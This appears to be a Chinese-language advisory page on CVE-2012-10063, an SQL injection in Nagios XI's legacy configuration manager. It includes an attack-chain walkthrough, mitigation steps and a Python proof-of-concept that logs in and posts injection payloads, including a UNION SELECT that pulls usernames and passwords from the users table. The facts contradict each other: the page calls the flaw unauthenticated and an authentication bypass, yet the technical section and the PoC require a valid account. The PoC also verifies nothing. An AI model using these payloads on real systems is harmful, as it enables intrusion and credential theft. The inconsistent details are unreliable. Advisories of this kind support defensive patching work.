CVE-2012-10063 Nagios XI 旧版CCM界面SQL注入漏洞

漏洞信息

漏洞编号

CVE-2012-10063

漏洞类型

SQL注入

CVSS评分

9.8 严重

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

Nagios XI

漏洞概述

CVE-2012-10063是Nagios XI网络监控软件中的一个高危SQL注入漏洞。该漏洞存在于Nagios XI 2012R1.3之前版本的旧版核心配置管理器(CCM, Core Configuration Manager)界面中。CCM是Nagios XI用于管理监控配置、通知设置和系统资源的关键组件。由于该组件在处理用户输入时未对特殊字符进行充分的过滤和转义，攻击者可以通过构造恶意的SQL语句片段来操纵后台数据库查询。成功利用此漏洞的攻击者能够绕过正常的认证机制，对数据库中的敏感信息进行读取或修改，包括监控配置数据、通知联系人信息、凭据凭证等。在某些情况下，攻击者甚至可以通过SQL注入进一步获取服务器操作系统级别的访问权限，实现远程代码执行。由于该漏洞的CVSS评分高达9.8，属于紧急严重级别，建议所有使用受影响版本Nagios XI的用户立即采取修复措施。

技术细节

该SQL注入漏洞位于Nagios XI的Legacy CCM(核心配置管理器)组件中，具体问题出在处理特定CCM参数时缺乏输入验证。当认证用户通过CCM界面进行配置管理操作时，系统会将用户提交的参数直接拼接到SQL查询语句中，攻击者可以利用这一特性注入任意SQL代码。漏洞主要影响以下功能模块：通知配置管理、联系人组管理、主机和服务监控配置等。攻击者需要具备有效的Nagios XI用户账户才能利用此漏洞，但值得注意的是，某些配置下可能存在默认账户或弱密码，使得攻击门槛进一步降低。技术层面，攻击者通过在参数值中插入SQL元字符(如单引号、分号、UNION SELECT等)来改变原始查询的逻辑结构，从而实现数据提取、权限提升或系统命令执行。修复方案包括：对所有用户输入进行严格的输入验证和参数化查询，使用预编译语句(Prepared Statements)替代字符串拼接，以及实施最小权限原则限制数据库账户权限。

攻击链分析

STEP 1

步骤1: 信息收集

攻击者识别目标Nagios XI服务器版本，确认版本低于2012R1.3

STEP 2

步骤2: 获取认证凭据

通过暴力破解、社会工程或利用默认凭据获取有效的用户账户

STEP 3

步骤3: 访问CCM界面

使用有效凭据登录Nagios XI，导航至Legacy CCM配置管理模块

STEP 4

步骤4: 构造恶意载荷

在CCM参数中注入SQL注入载荷，如使用单引号闭合或UNION语句

STEP 5

步骤5: 执行注入攻击

提交构造的请求，触发SQL注入漏洞，操纵数据库查询

STEP 6

步骤6: 数据提取或权限提升

通过注入获取敏感数据(用户凭据、配置信息)或提升权限

STEP 7

步骤7: 持久化控制

在某些情况下，可进一步利用获取的数据库访问权限执行系统命令

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests import sys # CVE-2012-10063 Nagios XI SQL Injection PoC # Target: Nagios XI < 2012R1.3 # Authentication required def exploit_sqli(target_url, username, password): """ Exploit SQL injection in Nagios XI CCM interface """ session = requests.Session() # Step 1: Login to Nagios XI login_url = f"{target_url}/nagiosxi/login.php" login_data = { 'username': username, 'password': password } try: response = session.post(login_url, data=login_data, timeout=10) # Step 2: Access CCM with malicious payload ccm_url = f"{target_url}/nagiosxi/config/notification?cmd=modify" sqli_payload = "' OR '1'='1" exploit_data = { 'contact_name': sqli_payload, 'email': '[email protected]' } response = session.post(ccm_url, data=exploit_data, timeout=10) # Step 3: Extract data via UNION-based injection union_payload = "' UNION SELECT NULL,username,password,NULL,NULL,NULL,NULL,NULL,NULL,NULL FROM nagiosxi.users--" exploit_data['contact_name'] = union_payload response = session.post(ccm_url, data=exploit_data, timeout=10) print(f"[*] Exploit sent to {ccm_url}") print(f"[*] Response status: {response.status_code}") except requests.exceptions.RequestException as e: print(f"[!] Error: {e}") return False return True if __name__ == "__main__": if len(sys.argv) < 4: print("Usage: python cve-2012-10063.py <target_url> <username> <password>") print("Example: python cve-2012-10063.py http://nagios-server admin nagios") sys.exit(1) target = sys.argv[1] user = sys.argv[2] pwd = sys.argv[3] exploit_sqli(target, user, pwd)

影响范围

Nagios XI < 2012R1.3

防御指南

临时缓解措施

立即将Nagios XI升级至2012R1.3或最新稳定版本。如果无法立即升级，可采取以下临时措施：1)禁用Legacy CCM模块，改用新版配置管理器；2)限制CCM访问权限，仅允许受信任的管理员账户访问；3)在前端部署WAF规则阻断常见的SQL注入特征(如单引号、UNION、SELECT等关键字)；4)加强对Nagios XI用户账户的管理，定期更换密码，禁用默认账户；5)启用详细的审计日志，监控异常的数据库查询行为。建议在维护窗口内尽快完成版本升级以消除该严重漏洞风险。